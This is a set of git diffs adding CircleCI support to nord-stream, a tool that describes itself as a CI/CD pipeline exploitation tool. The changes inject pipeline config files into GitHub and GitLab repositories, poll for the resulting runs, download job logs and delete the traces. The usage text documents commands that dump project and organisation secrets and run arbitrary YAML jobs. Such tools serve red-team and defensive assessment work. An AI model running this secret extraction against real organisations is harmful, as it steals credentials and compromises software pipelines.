+        """
+        For GitHub App / GitLab App integrations the git push automatically
+        triggers a pipeline.  Poll GET /project/<slug>/pipeline until a pipeline
+        for the given branch appears (most-recent first), then return its id.
+        Returns None on timeout.
+        """
+        logger.info(f"Waiting for pipeline to appear on branch '{branch}'")
+        for i in range(self._maxRetry):
+            time.sleep(self._sleepTime)
+            r = self._session.get(
+                f"{CIRCLECI_API_URL}/project/{projectSlug}/pipeline",
+                headers=self._header,
+                params={"branch": branch},
+            )
+            if r.status_code != 200:
+                logger.warning(f"Pipeline list returned {r.status_code}, retrying ({i+1}/{self._maxRetry})")
+                continue
+            items = r.json().get("items", [])
+            if items:
+                pipeline_id = items[0].get("id")
+                logger.verbose(f"Found pipeline: {pipeline_id}")
+                return pipeline_id
+            logger.warning(f"No pipeline yet on branch '{branch}', retrying ({i+1}/{self._maxRetry})")
+        logger.error(f"Timed out waiting for pipeline on branch '{branch}'")
+        return None
+
+    def getPipelineWorkflows(self, pipelineId):
+        """Return the list of workflow dicts for a pipeline."""
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/pipeline/{pipelineId}/workflow",
+            headers=self._header,
+        )
+        r.raise_for_status()
+        return r.json().get("items", [])
+
+    def waitPipeline(self, pipelineId):
+        """
+        Poll until the first workflow of the pipeline reaches a terminal state.
+        Returns (workflowId, status) where status is one of:
+            success | failed | error | canceled | unauthorized
+        Returns (None, None) on timeout.
+        """
+        logger.info("Waiting for CircleCI pipeline to complete")
+        terminal = {"success", "failed", "error", "canceled", "unauthorized"}
+
+        for i in range(self._maxRetry):
+            time.sleep(self._sleepTime)
+            workflows = self.getPipelineWorkflows(pipelineId)
+            if not workflows:
+                logger.warning(f"No workflow yet, retrying ({i+1}/{self._maxRetry})")
+                continue
+            wf = workflows[0]
+            status = wf.get("status")
+            wfId = wf.get("id")
+            logger.verbose(f"Workflow status: {status}")
+            if status in terminal:
+                return wfId, status
+            logger.warning(f"Workflow not finished ({status}), sleeping for {self._sleepTime}s")
+
+        logger.error("Timed out waiting for CircleCI pipeline.")
+        return None, None
+
+    def getWorkflowJobs(self, workflowId):
+        """Return the list of job dicts for a workflow."""
+        r = self._session.get(
+            f"{CIRCLECI_API_URL}/workflow/{workflowId}/job",
+            headers=self._header,
+        )
+        r.raise_for_status()
+        return r.json().get("items", [])
+
+    def cancelWorkflow(self, workflowId):
+        """Request cancellation of a workflow."""
+        logger.debug(f"Cancelling workflow {workflowId}")
+        self._session.post(
+            f"{CIRCLECI_API_URL}/workflow/{workflowId}/cancel",
+            headers=self._header,
+        )
+
+    # ------------------------------------------------------------------
+    # Job output
+    # ------------------------------------------------------------------
+
+    def getJobStepOutput(self, projectSlug, jobNumber):
+        """
+        Retrieve the raw output of the 'command' step for the given job.
+
+        The v2 API /project/{slug}/job/{num} does not return step details for
+        GitHub App / GitLab App projects.  The v1.1 API does, and it works for
+        all integration types.
+
+        Returns the raw log text (JSON array of message objects), or None.
+        """
+        logger.debug(f"Fetching step output for job {jobNumber} in {projectSlug}")
+
+        # v1.1 returns steps[].actions[].output_url for all integration types.
+        r = self._session.get(
+            f"https://circleci.com/api/v1.1/project/{projectSlug}/{jobNumber}",
+            headers=self._header,
+        )
+        if r.status_code == 404:
+            logger.debug(f"v1.1 job endpoint returned 404 for job {jobNumber}")
+            return None
+        r.raise_for_status()
+        job_data = r.json()
+
+        # Walk through steps → actions to find the "command" step output URL
+        for step in job_data.get("steps", []):
+            for action in step.get("actions", []):
+                if action.get("name") == "command" and action.get("output_url"):
+                    output_url = action["output_url"]
+                    logger.debug(f"Downloading output from {output_url}")
+                    out_r = self._session.get(output_url, headers=self._header)
+                    if out_r.status_code == 200:
+                        return out_r.text
+        return None
+
+    def downloadJobOutput(self, projectSlug, jobNumber, outputDir, outputName):
+        """
+        Download and save the step output for the given job to disk.
+        Returns the saved file path, or None if no output was found.
+        """
+        makedirs(outputDir, exist_ok=True)
+        text = self.getJobStepOutput(projectSlug, jobNumber)
+        if text is None:
+            logger.error(f"No output found for job {jobNumber}")
+            return None
+
+        date = time.strftime("%Y-%m-%d_%H-%M-%S")
+        filePath = f"{outputDir}/circleci_{outputName}_{date}.log"
+        with open(filePath, "w") as f:
+            f.write(text)
+        logger.debug(f"Job output saved to {filePath}")
+        return filePath
+
+    @property
+    def outputDir(self):
+        return self._outputDir
+
+    @outputDir.setter
+    def outputDir(self, value):
+        self._outputDir = value

--- a/nordstream/cicd/github.py
+++ b/nordstream/cicd/github.py
@@ -1,3 +1,4 @@
+import base64
 import requests
 import time
 from os import makedirs
@@ -649,11 +650,10 @@ class GitHub:
         existingSHA: required when updating an existing file.
         Returns the blob SHA of the created/updated file.
         """
-        import base64 as _b64
         logger.debug(f"Creating/updating {path} in {repo}@{branch}")
         if isinstance(content, str):
             content = content.encode()
-        encoded = _b64.b64encode(content).decode()
+        encoded = base64.b64encode(content).decode()
         payload = {
             "message": commitMessage,
             "content": encoded,
@@ -687,6 +687,6 @@ class GitHub:
             json=payload,
             auth=self._auth,
             headers=self._header,
-        ).json()
-        if r.get("message") and "commit" not in r:
-            raise GitHubError(f"deleteFile: {r['message']}")
+        )
+        if r.status_code not in (200, 204):
+            raise GitHubError(f"deleteFile: HTTP {r.status_code} — {r.text[:200]}")

--- a/nordstream/cicd/github.py
+++ b/nordstream/cicd/github.py
@@ -618,3 +618,75 @@ class GitHub:
 
     def isGHSToken(self):
         return self._isGHSToken
+
+    # ------------------------------------------------------------------
+    # Contents API — used by the standalone CircleCI runner to inject
+    # config files without requiring a local git installation.
+    # ------------------------------------------------------------------
+
+    def getFileSHA(self, repo, path, branch="main"):
+        """
+        Return the blob SHA of an existing file, or None if it doesn't exist.
+        Required by the GitHub Contents API to update or delete a file.
+        """
+        logger.debug(f"Getting SHA for {path} in {repo}@{branch}")
+        r = self._session.get(
+            f"{self._repoURL}/{repo}/contents/{urllib.parse.quote(path)}",
+            params={"ref": branch},
+            auth=self._auth,
+            headers=self._header,
+        )
+        if r.status_code == 404:
+            return None
+        if r.status_code == 200:
+            return r.json().get("sha")
+        raise GitHubError(f"getFileSHA: unexpected status {r.status_code}")
+
+    def createOrUpdateFile(self, repo, path, content, branch, commitMessage, existingSHA=None):
+        """
+        Create or update a file via the GitHub Contents API.
+        content: raw bytes or str — will be base64-encoded.
+        existingSHA: required when updating an existing file.
+        Returns the blob SHA of the created/updated file.
+        """
+        import base64 as _b64
+        logger.debug(f"Creating/updating {path} in {repo}@{branch}")
+        if isinstance(content, str):
+            content = content.encode()
+        encoded = _b64.b64encode(content).decode()
+        payload = {
+            "message": commitMessage,
+            "content": encoded,
+            "branch": branch,
+        }
+        if existingSHA:
+            payload["sha"] = existingSHA
+        r = self._session.put(
+            f"{self._repoURL}/{repo}/contents/{urllib.parse.quote(path)}",
+            json=payload,
+            auth=self._auth,
+            headers=self._header,
+        ).json()
+        if r.get("message"):
+            raise GitHubError(f"createOrUpdateFile: {r['message']}")
+        return r.get("content", {}).get("sha")
+
+    def deleteFile(self, repo, path, sha, branch, commitMessage):
+        """
+        Delete a file via the GitHub Contents API.
+        sha: the blob SHA returned by createOrUpdateFile / getFileSHA.
+        """
+        logger.debug(f"Deleting {path} in {repo}@{branch}")
+        payload = {
+            "message": commitMessage,
+            "sha": sha,
+            "branch": branch,
+        }
+        r = self._session.delete(
+            f"{self._repoURL}/{repo}/contents/{urllib.parse.quote(path)}",
+            json=payload,
+            auth=self._auth,
+            headers=self._header,
+        ).json()
+        if r.get("message") and "commit" not in r:
+            raise GitHubError(f"deleteFile: {r['message']}")

--- a/nordstream/cicd/gitlab.py
+++ b/nordstream/cicd/gitlab.py
@@ -2,6 +2,7 @@ import requests
 import time
 import re
 import sys
+import urllib.parse
 from os import makedirs
 from nordstream.utils.log import logger
 from nordstream.utils.errors import GitLabError
@@ -700,37 +701,34 @@ class GitLab:
 
     def getFileSHA(self, projectId, path, branch="main"):
         """
-        Return the last_commit_id (blob ref) for an existing file, or None.
-        GitLab uses the last commit ID as the equivalent of GitHub's blob SHA
-        for file operations — but for delete we just need the file to exist.
+        Return the blob_id for an existing file, or None if it does not exist.
+        Used before createOrUpdateFile (to signal update vs. create) and by the
+        standalone CircleCI runner to obtain a SHA for cleanup.
         """
-        import urllib.parse as _up
         logger.debug(f"Getting file info for {path} in project {projectId}@{branch}")
-        encoded_path = _up.quote(path, safe="")
+        encoded_path = urllib.parse.quote(path, safe="")
         r = self._session.get(
-            f"{self._url}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
+            f"{self._gitlabURL}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
             params={"ref": branch},
-            headers=self._header,
         )
         if r.status_code == 404:
             return None
         if r.status_code == 200:
-            # Return the blob_id as the "SHA" equivalent
             return r.json().get("blob_id")
-        raise Exception(f"getFileSHA: unexpected status {r.status_code}")
+        raise GitLabError(f"getFileSHA: unexpected status {r.status_code}")
 
     def createOrUpdateFile(self, projectId, path, content, branch, commitMessage, existingSHA=None):
         """
         Create or update a file via the GitLab Repository Files API.
         content: raw bytes or str.
         existingSHA: if provided the file already exists and will be updated (PUT).
-        Returns the file_path (GitLab doesn't return a SHA on create/update).
+        Returns the current blob_id after the operation (obtained via a follow-up
+        getFileSHA call, since the GitLab create/update response does not include it).
         """
-        import base64 as _b64, urllib.parse as _up
         logger.debug(f"Creating/updating {path} in project {projectId}@{branch}")
         if isinstance(content, bytes):
             content = content.decode()
-        encoded_path = _up.quote(path, safe="")
+        encoded_path = urllib.parse.quote(path, safe="")
         payload = {
             "branch": branch,
             "content": content,
@@ -739,30 +737,28 @@ class GitLab:
         }
         method = self._session.put if existingSHA else self._session.post
         r = method(
-            f"{self._url}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
+            f"{self._gitlabURL}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
             json=payload,
-            headers=self._header,
-        ).json()
-        if r.get("message"):
-            raise Exception(f"createOrUpdateFile: {r['message']}")
-        return r.get("file_path")
+        )
+        if r.status_code not in (200, 201):
+            raise GitLabError(f"createOrUpdateFile: HTTP {r.status_code} — {r.text[:200]}")
+        # Fetch the blob_id so the caller can use it for cleanup
+        return self.getFileSHA(projectId, path, branch)
 
     def deleteFile(self, projectId, path, sha, branch, commitMessage):
         """
         Delete a file via the GitLab Repository Files API.
         sha is not required by GitLab (unlike GitHub) but kept for interface parity.
         """
-        import urllib.parse as _up
         logger.debug(f"Deleting {path} in project {projectId}@{branch}")
-        encoded_path = _up.quote(path, safe="")
+        encoded_path = urllib.parse.quote(path, safe="")
         payload = {
             "branch": branch,
             "commit_message": commitMessage,
         }
         r = self._session.delete(
-            f"{self._url}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
+            f"{self._gitlabURL}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
             json=payload,
-            headers=self._header,
         )
         if r.status_code not in (200, 204):
-            raise Exception(f"deleteFile: status {r.status_code} — {r.text[:200]}")
+            raise GitLabError(f"deleteFile: HTTP {r.status_code} — {r.text[:200]}")

--- a/nordstream/cicd/gitlab.py
+++ b/nordstream/cicd/gitlab.py
@@ -692,3 +692,77 @@ class GitLab:
                 res.append(failure)
 
         return res
+
+    # ------------------------------------------------------------------
+    # Repository Files API — used by the standalone CircleCI runner to
+    # inject config files without requiring a local git installation.
+    # ------------------------------------------------------------------
+
+    def getFileSHA(self, projectId, path, branch="main"):
+        """
+        Return the last_commit_id (blob ref) for an existing file, or None.
+        GitLab uses the last commit ID as the equivalent of GitHub's blob SHA
+        for file operations — but for delete we just need the file to exist.
+        """
+        import urllib.parse as _up
+        logger.debug(f"Getting file info for {path} in project {projectId}@{branch}")
+        encoded_path = _up.quote(path, safe="")
+        r = self._session.get(
+            f"{self._url}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
+            params={"ref": branch},
+            headers=self._header,
+        )
+        if r.status_code == 404:
+            return None
+        if r.status_code == 200:
+            # Return the blob_id as the "SHA" equivalent
+            return r.json().get("blob_id")
+        raise Exception(f"getFileSHA: unexpected status {r.status_code}")
+
+    def createOrUpdateFile(self, projectId, path, content, branch, commitMessage, existingSHA=None):
+        """
+        Create or update a file via the GitLab Repository Files API.
+        content: raw bytes or str.
+        existingSHA: if provided the file already exists and will be updated (PUT).
+        Returns the file_path (GitLab doesn't return a SHA on create/update).
+        """
+        import base64 as _b64, urllib.parse as _up
+        logger.debug(f"Creating/updating {path} in project {projectId}@{branch}")
+        if isinstance(content, bytes):
+            content = content.decode()
+        encoded_path = _up.quote(path, safe="")
+        payload = {
+            "branch": branch,
+            "content": content,
+            "commit_message": commitMessage,
+            "encoding": "text",
+        }
+        method = self._session.put if existingSHA else self._session.post
+        r = method(
+            f"{self._url}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
+            json=payload,
+            headers=self._header,
+        ).json()
+        if r.get("message"):
+            raise Exception(f"createOrUpdateFile: {r['message']}")
+        return r.get("file_path")
+
+    def deleteFile(self, projectId, path, sha, branch, commitMessage):
+        """
+        Delete a file via the GitLab Repository Files API.
+        sha is not required by GitLab (unlike GitHub) but kept for interface parity.
+        """
+        import urllib.parse as _up
+        logger.debug(f"Deleting {path} in project {projectId}@{branch}")
+        encoded_path = _up.quote(path, safe="")
+        payload = {
+            "branch": branch,
+            "commit_message": commitMessage,
+        }
+        r = self._session.delete(
+            f"{self._url}/api/v4/projects/{projectId}/repository/files/{encoded_path}",
+            json=payload,
+            headers=self._header,
+        )
+        if r.status_code not in (200, 204):
+            raise Exception(f"deleteFile: status {r.status_code} — {r.text[:200]}")

--- a/nordstream/commands/circleci.py
+++ b/nordstream/commands/circleci.py
@@ -56,6 +56,8 @@ Authors: @hugow @0hexit
 
 from docopt import docopt
 from nordstream.cicd.circleci import CircleCI
+from nordstream.cicd.github import GitHub
+from nordstream.cicd.gitlab import GitLab
 from nordstream.core.circleci.standalone import CircleCIStandaloneRunner
 from nordstream.utils.log import logger, NordStreamLog
 
@@ -102,7 +104,7 @@ def start(argv):
 
     # --- Build git client if --git-token is provided ---
     gitClient = None
-    gitOrg = org  # default: use CircleCI org name as git org name
+    gitOrg = org  # default: use CircleCI org slug/UUID as the git org name
 
     if args["--git-token"]:
         gitToken = args["--git-token"]
@@ -110,22 +112,22 @@ def start(argv):
 
         if vcsType == "gl":
             # GitLab client
-            from nordstream.cicd.gitlab import GitLab
+            logger.warning(
+                "GitLab standalone CircleCI extraction is experimental. "
+                "The GitLab App provider mapping may not be correct for all setups."
+            )
             gitLabUrl = gitApiUrl or "https://gitlab.com"
             if not GitLab.checkToken(gitToken, gitLabUrl):
                 logger.critical("Invalid GitLab token.")
             gitClient = GitLab(gitLabUrl, gitToken)
         else:
             # GitHub client (for both "gh" and "circleci" vcsType)
-            from nordstream.cicd.github import GitHub
             if not GitHub.checkToken(gitToken):
                 logger.critical("Invalid GitHub token.")
             gitClient = GitHub(gitToken)
             if gitApiUrl:
                 # Allow overriding the GitHub API base URL for GHES
                 gitClient._repoURL = gitApiUrl.rstrip("/") + "/repos"
-            # Use GitHub org name from token if available, else fall back to org arg
-            gitOrg = org
 
     # --- Extraction requires a git client ---
     if not args["--list-secrets"] and gitClient is None:
@@ -143,18 +145,14 @@ def start(argv):
         gitOrg=gitOrg,
     )
 
-    if args["--no-repo"]:
-        runner.extractProject = False
-    if args["--no-org"]:
-        runner.extractOrg = False
-    if args["--no-clean"]:
-        runner.cleanLogs = False
+    runner.extractProject = not args["--no-repo"]
+    runner.extractOrg = not args["--no-org"]
+    runner.cleanLogs = not args["--no-clean"]
     if args["--yaml"]:
         runner.yaml = args["--yaml"]
 
     # --- Discover / load projects ---
-    if not args["--describe-token"]:
-        runner.loadProjects(repoOverride=args["--repo"])
+    runner.loadProjects(repoOverride=args["--repo"])
 
     # --- Dispatch ---
     if args["--list-secrets"]:

--- a/nordstream/commands/circleci.py
+++ b/nordstream/commands/circleci.py
@@ -1,0 +1,163 @@
+"""
+CICD pipeline exploitation tool
+
+Usage:
+    nord-stream circleci [options] --circleci-token <cct> --org <org> [--repo <repo> --no-repo --no-org --no-clean --vcs <vcs> --git-token <tok> --git-url <url>]
+    nord-stream circleci [options] --circleci-token <cct> --org <org> --yaml <yaml> [--repo <repo> --no-clean --vcs <vcs> --git-token <tok> --git-url <url>]
+    nord-stream circleci [options] --circleci-token <cct> --org <org> --list-secrets [--repo <repo> --no-repo --no-org --vcs <vcs>]
+    nord-stream circleci [options] --circleci-token <cct> --describe-token
+
+Options:
+    -h --help                Show this screen.
+    --version                Show version.
+    -v, --verbose            Verbose mode
+    -d, --debug              Debug mode
+    --output-dir <dir>       Output directory for logs
+
+args:
+    --circleci-token <cct>   CircleCI API token
+    --org <org>              CircleCI org slug or UUID
+    --git-token <tok>        GitHub or GitLab PAT for the VCS contents API.
+                             Required for extraction. Not needed for --list-secrets.
+    --git-url <url>          Override git API base URL.
+                             Default: https://api.github.com for gh/circleci vcs;
+                             https://gitlab.com for gl vcs.
+    --vcs <vcs>              CircleCI VCS type: gh, gl, or circleci (default: circleci)
+    --repo <repo>            Target a single project by name or UUID.
+                             If omitted, all projects under --org are discovered.
+    --no-repo                Don't extract project environment variables.
+    --no-org                 Don't extract org-level contexts.
+    -y, --yaml <yaml>        Inject a custom CircleCI pipeline YAML file.
+    --no-clean               Don't delete the config file or pipeline definition.
+    --list-secrets           List secret names only (no git token required).
+    --describe-token         Display CircleCI token and org information.
+
+Examples:
+    Describe the CircleCI token
+    $ nord-stream circleci --circleci-token "$CCT" --describe-token
+
+    List all CircleCI secrets for an org (no git token needed)
+    $ nord-stream circleci --circleci-token "$CCT" --org H3xy1JwUnkBcQApbzLKwzq --list-secrets
+
+    Extract secrets from all projects under an org
+    $ nord-stream circleci --circleci-token "$CCT" --org H3xy1JwUnkBcQApbzLKwzq --git-token "$GHP"
+
+    Extract secrets from a single project
+    $ nord-stream circleci --circleci-token "$CCT" --org H3xy1JwUnkBcQApbzLKwzq --git-token "$GHP" --repo RZ3kVnuJPyfqHsaSrRhcCK
+
+    Extract secrets from a classic GitHub OAuth project
+    $ nord-stream circleci --circleci-token "$CCT" --org myorg --git-token "$GHP" --vcs gh
+
+    Extract secrets from a GitLab-hosted project
+    $ nord-stream circleci --circleci-token "$CCT" --org mygroup --git-token "$GLPAT" --vcs gl
+
+Authors: @hugow @0hexit
+"""
+
+from docopt import docopt
+from nordstream.cicd.circleci import CircleCI
+from nordstream.core.circleci.standalone import CircleCIStandaloneRunner
+from nordstream.utils.log import logger, NordStreamLog
+
+
+def start(argv):
+    args = docopt(__doc__, argv=argv)
+
+    if args["--verbose"]:
+        NordStreamLog.setVerbosity(verbose=1)
+    if args["--debug"]:
+        NordStreamLog.setVerbosity(verbose=2)
+
+    logger.debug(args)
+
+    # --- Validate CircleCI token ---
+    circleCIToken = args["--circleci-token"]
+    if not CircleCI.checkToken(circleCIToken):
+        logger.critical("Invalid CircleCI token.")
+
+    circleCIClient = CircleCI(circleCIToken)
+    if args["--output-dir"]:
+        circleCIClient.outputDir = args["--output-dir"] + "/"
+
+    # --- describe-token needs nothing else ---
+    if args["--describe-token"]:
+        runner = CircleCIStandaloneRunner(
+            circleCicd=circleCIClient,
+            gitClient=None,
+            vcsType="circleci",
+            org="",
+            gitOrg="",
+        )
+        runner.describeToken()
+        return
+
+    # --- Everything else requires --org ---
+    org = args["--org"]
+    if not org:
+        logger.critical("--org is required.")
+
+    vcsType = args["--vcs"] or "circleci"
+    if vcsType not in ("gh", "gl", "circleci"):
+        logger.critical(f"Invalid --vcs value '{vcsType}'. Must be gh, gl, or circleci.")
+
+    # --- Build git client if --git-token is provided ---
+    gitClient = None
+    gitOrg = org  # default: use CircleCI org name as git org name
+
+    if args["--git-token"]:
+        gitToken = args["--git-token"]
+        gitApiUrl = args["--git-url"]
+
+        if vcsType == "gl":
+            # GitLab client
+            from nordstream.cicd.gitlab import GitLab
+            gitLabUrl = gitApiUrl or "https://gitlab.com"
+            if not GitLab.checkToken(gitToken, gitLabUrl):
+                logger.critical("Invalid GitLab token.")
+            gitClient = GitLab(gitLabUrl, gitToken)
+        else:
+            # GitHub client (for both "gh" and "circleci" vcsType)
+            from nordstream.cicd.github import GitHub
+            if not GitHub.checkToken(gitToken):
+                logger.critical("Invalid GitHub token.")
+            gitClient = GitHub(gitToken)
+            if gitApiUrl:
+                # Allow overriding the GitHub API base URL for GHES
+                gitClient._repoURL = gitApiUrl.rstrip("/") + "/repos"
+            # Use GitHub org name from token if available, else fall back to org arg
+            gitOrg = org
+
+    # --- Extraction requires a git client ---
+    if not args["--list-secrets"] and gitClient is None:
+        logger.critical(
+            "--git-token is required for secret extraction. "
+            "Use --list-secrets to list secret names without a git token."
+        )
+
+    # --- Build runner ---
+    runner = CircleCIStandaloneRunner(
+        circleCicd=circleCIClient,
+        gitClient=gitClient,
+        vcsType=vcsType,
+        org=org,
+        gitOrg=gitOrg,
+    )
+
+    if args["--no-repo"]:
+        runner.extractProject = False
+    if args["--no-org"]:
+        runner.extractOrg = False
+    if args["--no-clean"]:
+        runner.cleanLogs = False
+    if args["--yaml"]:
+        runner.yaml = args["--yaml"]
+
+    # --- Discover / load projects ---
+    if not args["--describe-token"]:
+        runner.loadProjects(repoOverride=args["--repo"])
+
+    # --- Dispatch ---
+    if args["--list-secrets"]:
+        runner.listCircleCISecrets()
+    else:
+        runner.start()

--- a/nordstream/commands/github.py
+++ b/nordstream/commands/github.py
@@ -12,6 +12,9 @@ Usage:
     nord-stream github [options] --token <ghp> --org <org> --list-secrets [--repo <repo> --no-repo --no-env --no-org]
     nord-stream github [options] --token <ghp> [--org <org>] --list-repos [--write-filter]
     nord-stream github [options] --token <ghp> --describe-token
+    nord-stream github [options] --token <ghp> --org <org> --circleci [--repo <repo> --no-repo --no-org --branch-name <name> --no-clean]
+    nord-stream github [options] --token <ghp> --org <org> --circleci --yaml <yaml> --repo <repo> [--branch-name <name> --no-clean]
+    nord-stream github [options] --token <ghp> --org <org> --circleci --list-secrets [--repo <repo> --no-repo --no-org]
 
 Options:
     -h --help                               Show this screen.
@@ -52,6 +55,14 @@ args:
     --force                                 Don't check environment and branch protections.
     --branch-name <name>                    Use specific branch name for deployment.
     --describe-token                        Display information on the token
+    --circleci                              Target CircleCI pipelines instead of GitHub Actions
+    --circleci-token <cct>                  CircleCI API token (required when --circleci is used)
+    --circleci-vcs <vcs>                    CircleCI VCS type: 'gh', 'gl', or 'circleci' for GitHub App / GitLab App
+                                            projects (default: gh)
+    --circleci-org <corg>                   CircleCI org name or UUID (defaults to --org value).
+                                            Use the org UUID when --circleci-vcs circleci
+    --circleci-project <cproject>           CircleCI project name or UUID for a single target project.
+                                            Use the project UUID when --circleci-vcs circleci
 
 Examples:
     List all secrets from all repositories
@@ -59,6 +70,15 @@ Examples:
 
     Dump all secrets from all repositories and try to disable branch protections
     $ nord-stream github --token "$GHP" --org myorg --disable-protections
+
+    List CircleCI secrets (project env vars + contexts) for all repositories
+    $ nord-stream github --token "$GHP" --org myorg --circleci --circleci-token "$CCT" --list-secrets
+
+    Dump CircleCI secrets from all repositories
+    $ nord-stream github --token "$GHP" --org myorg --circleci --circleci-token "$CCT"
+
+    Dump CircleCI secrets — GitHub App integration (org/project UUIDs, vcs=circleci)
+    $ nord-stream github --token "$GHP" --org myorg --repo myrepo --circleci --circleci-token "$CCT" --circleci-vcs circleci --circleci-org <org-uuid> --circleci-project <project-uuid>
 
 Authors: @hugow @0hexit
 """
@@ -132,6 +152,44 @@ def start(argv):
         gitHubWorkflowRunner.region = args["--aws-region"]
     if args["--no-clean"]:
         gitHubWorkflowRunner.cleanLogs = not args["--no-clean"]
+
+    # CircleCI mode — attach a CircleCIRunner to the workflow runner
+    if args["--circleci"]:
+        if not args["--circleci-token"]:
+            logger.critical("--circleci-token is required when --circleci is used.")
+
+        from nordstream.cicd.circleci import CircleCI
+        from nordstream.core.circleci.circleci import CircleCIRunner
+
+        if not CircleCI.checkToken(args["--circleci-token"]):
+            logger.critical("Invalid CircleCI token.")
+
+        circleCIClient = CircleCI(args["--circleci-token"])
+        # VCS type: default to 'gh' for GitHub; override with --circleci-vcs
+        circleCIVcs = args["--circleci-vcs"] or "gh"
+        # Org: default to the GitHub --org value; override with --circleci-org
+        circleCIOrg = args["--circleci-org"] or args["--org"]
+        circleCIProject = args["--circleci-project"]  # None means "derive from repo name"
+        # Note: docopt stores --circleci-org as args["--circleci-org"] and
+        #       --circleci-project as args["--circleci-project"] regardless of metavar
+
+        circleCIRunner = CircleCIRunner(
+            gitHub, circleCIClient,
+            vcsType=circleCIVcs,
+            circleOrg=circleCIOrg,
+            circleProject=circleCIProject,
+        )
+
+        if args["--no-repo"]:
+            circleCIRunner.extractProject = not args["--no-repo"]
+        if args["--no-org"]:
+            circleCIRunner.extractOrg = not args["--no-org"]
+        if args["--yaml"]:
+            circleCIRunner.yaml = args["--yaml"]
+        if args["--no-clean"]:
+            circleCIRunner.cleanLogs = not args["--no-clean"]
+
+        gitHubWorkflowRunner.circleCIRunner = circleCIRunner
 
     # logic
     if args["--describe-token"]:

--- a/nordstream/commands/github.py
+++ b/nordstream/commands/github.py
@@ -85,7 +85,9 @@ Authors: @hugow @0hexit
 
 from docopt import docopt
 from nordstream.cicd.github import GitHub
+from nordstream.cicd.circleci import CircleCI
 from nordstream.core.github.github import GitHubWorkflowRunner
+from nordstream.core.circleci.circleci import CircleCIRunner
 from nordstream.utils.log import logger, NordStreamLog
 from nordstream.git import Git
 
@@ -158,9 +160,6 @@ def start(argv):
         if not args["--circleci-token"]:
             logger.critical("--circleci-token is required when --circleci is used.")
 
-        from nordstream.cicd.circleci import CircleCI
-        from nordstream.core.circleci.circleci import CircleCIRunner
-
         if not CircleCI.checkToken(args["--circleci-token"]):
             logger.critical("Invalid CircleCI token.")
 
@@ -181,14 +180,11 @@ def start(argv):
             circleProject=circleCIProject,
         )
 
-        if args["--no-repo"]:
-            circleCIRunner.extractProject = not args["--no-repo"]
-        if args["--no-org"]:
-            circleCIRunner.extractOrg = not args["--no-org"]
+        circleCIRunner.extractProject = not args["--no-repo"]
+        circleCIRunner.extractOrg = not args["--no-org"]
+        circleCIRunner.cleanLogs = not args["--no-clean"]
         if args["--yaml"]:
             circleCIRunner.yaml = args["--yaml"]
-        if args["--no-clean"]:
-            circleCIRunner.cleanLogs = not args["--no-clean"]
 
         gitHubWorkflowRunner.circleCIRunner = circleCIRunner
 

--- a/nordstream/commands/github.py
+++ b/nordstream/commands/github.py
@@ -58,7 +58,7 @@ args:
     --circleci                              Target CircleCI pipelines instead of GitHub Actions
     --circleci-token <cct>                  CircleCI API token (required when --circleci is used)
     --circleci-vcs <vcs>                    CircleCI VCS type: 'gh', 'gl', or 'circleci' for GitHub App / GitLab App
-                                            projects (default: gh)
+                                            projects. Auto-detected from the CircleCI API when omitted.
     --circleci-org <corg>                   CircleCI org name or UUID (defaults to --org value).
                                             Use the org UUID when --circleci-vcs circleci
     --circleci-project <cproject>           CircleCI project name or UUID for a single target project.
@@ -165,8 +165,9 @@ def start(argv):
             logger.critical("Invalid CircleCI token.")
 
         circleCIClient = CircleCI(args["--circleci-token"])
-        # VCS type: default to 'gh' for GitHub; override with --circleci-vcs
-        circleCIVcs = args["--circleci-vcs"] or "gh"
+        # VCS type: None means auto-resolve from the CircleCI API.
+        # Falls back to "gh" in the runner only when the project cannot be found.
+        circleCIVcs = args["--circleci-vcs"] or None
         # Org: default to the GitHub --org value; override with --circleci-org
         circleCIOrg = args["--circleci-org"] or args["--org"]
         circleCIProject = args["--circleci-project"]  # None means "derive from repo name"

--- a/nordstream/commands/gitlab.py
+++ b/nordstream/commands/gitlab.py
@@ -7,6 +7,9 @@ Usage:
     nord-stream gitlab [options] --token <pat> --yaml <yaml> --project <project> [--project-path <path> --no-clean]
     nord-stream gitlab [options] --token <pat> --clean-logs [--project <project>]
     nord-stream gitlab [options] --token <pat> --describe-token
+    nord-stream gitlab [options] --token <pat> --circleci --project <project> [--no-project --no-org --branch-name <name> --no-clean]
+    nord-stream gitlab [options] --token <pat> --circleci --yaml <yaml> --project <project> [--branch-name <name> --no-clean]
+    nord-stream gitlab [options] --token <pat> --circleci --list-secrets [--project <project> --no-project --no-org]
 
 Options:
     -h --help                               Show this screen.
@@ -37,6 +40,7 @@ args:
     --no-project                            Don't extract project secrets.
     --no-group                              Don't extract group secrets.
     --no-instance                           Don't extract instance secrets.
+    --no-org                                Don't extract org-level CircleCI contexts (CircleCI mode only).
     -y, --yaml <yaml>                       Run arbitrary job
     --branch-name <name>                    Use specific branch name for deployment.
     --clean-logs                            Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered.
@@ -44,6 +48,14 @@ args:
     --describe-token                        Display information on the token
     --sleep <seconds>                       Time to sleep in seconds between each secret request.
     --project-path <path>                   Local path of the git folder.
+    --circleci                              Target CircleCI pipelines instead of GitLab CI
+    --circleci-token <cct>                  CircleCI API token (required when --circleci is used)
+    --circleci-vcs <vcs>                    CircleCI VCS type: 'gl', 'gh', or 'circleci' for GitHub App / GitLab App
+                                            projects (default: gl)
+    --circleci-org <org>                    CircleCI org name or ID (defaults to the GitLab group/namespace).
+                                            Use the org UUID when --circleci-vcs circleci
+    --circleci-project <project>            CircleCI project name or ID for a single target project.
+                                            Use the project UUID when --circleci-vcs circleci
 
 Examples:
     Dump all secrets
@@ -51,6 +63,9 @@ Examples:
 
     Deploy the custom pipeline on the master branch
     $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch master --project 'group/projectname'
+
+    List CircleCI secrets for a GitLab-hosted project
+    $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --circleci --circleci-token "$CCT" --list-secrets --project 'group/projectname'
 
 Authors: @hugow @0hexit
 """
@@ -110,6 +125,30 @@ def start(argv):
